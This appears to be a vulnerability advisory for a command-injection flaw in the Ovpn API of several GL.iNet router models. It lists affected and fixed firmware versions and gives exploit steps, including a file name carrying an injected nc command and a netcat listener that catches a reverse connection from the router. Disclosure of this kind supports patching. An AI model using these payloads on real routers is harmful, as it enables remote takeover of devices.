This vulnerability can be exploited to manipulate routers by passing malicious shell commands through the Ovpn API.
● MT6000 /A1300 /X300B /AX1800 /AXT1800 /MT2500 /MT3000 /X3000 /XE3000 /XE300 /E750 /X750 /SFT1200 /AR300M /AR300M16 /AR750 /AR750S /B1300 /MT1300 /MT300N-V2 /AP1300 /B2200 /MV1000 /MV1000W /USB150 /SF1200 /N300 /S1300
● MT6000: 4.5.8, fixed in 4.6.2
● A1300/X300B: 4.5.16, fixed in 4.5.17
● AX1800/AXT1800/MT2500/MT3000: 4.5.16, fixed in 4.6.2
● X3000/XE3000: 4.4.8, fixed in 4.4.9
● XE300: 4.3.16, fixed in 4.3.17
● E750: 4.3.12, fixed in 4.3.17
● X750/SFT1200/AR300M/AR300M16/AR750/AR750S/B1300/MT1300/MT300N-V2: 4.3.11, fixed in 4.3.17
● AP1300: 3.217, fixed in 3.218
● B2200/MV1000/MV1000W/USB150/SF1200/N300/S1300: 3.216, fixed in 3.218
By invoking the interface of Ovpn, arbitrary shell commands can be executed to manipulate the router.
- Create a configuration file with a shell command in the filename: touch '$(nc 192.168.8.178 4444).txt'
- Use the previously created configuration file to create, for example, a tar archive: tar -cvf rce.tar '$(nc 192.168.8.178 4444).txt'
- Start an nc listener on the attacker's machine: nc -lvp 4444
- Use the upload function of the web application with the ovpn configuration to upload the tar archive file to the web application
- Then, a connection will be seen returning to the attacker's machine
- Start an nc listener on the attacker's machine: nc -lvp 4444
- (After authentication) Initiate a request with a malicious payload from the "params" parameter in the interface as part of the filename; additionally, append a valid administrative token as a parameter within "params".
Attackers can send malicious instructions through this vulnerability to manipulate routers.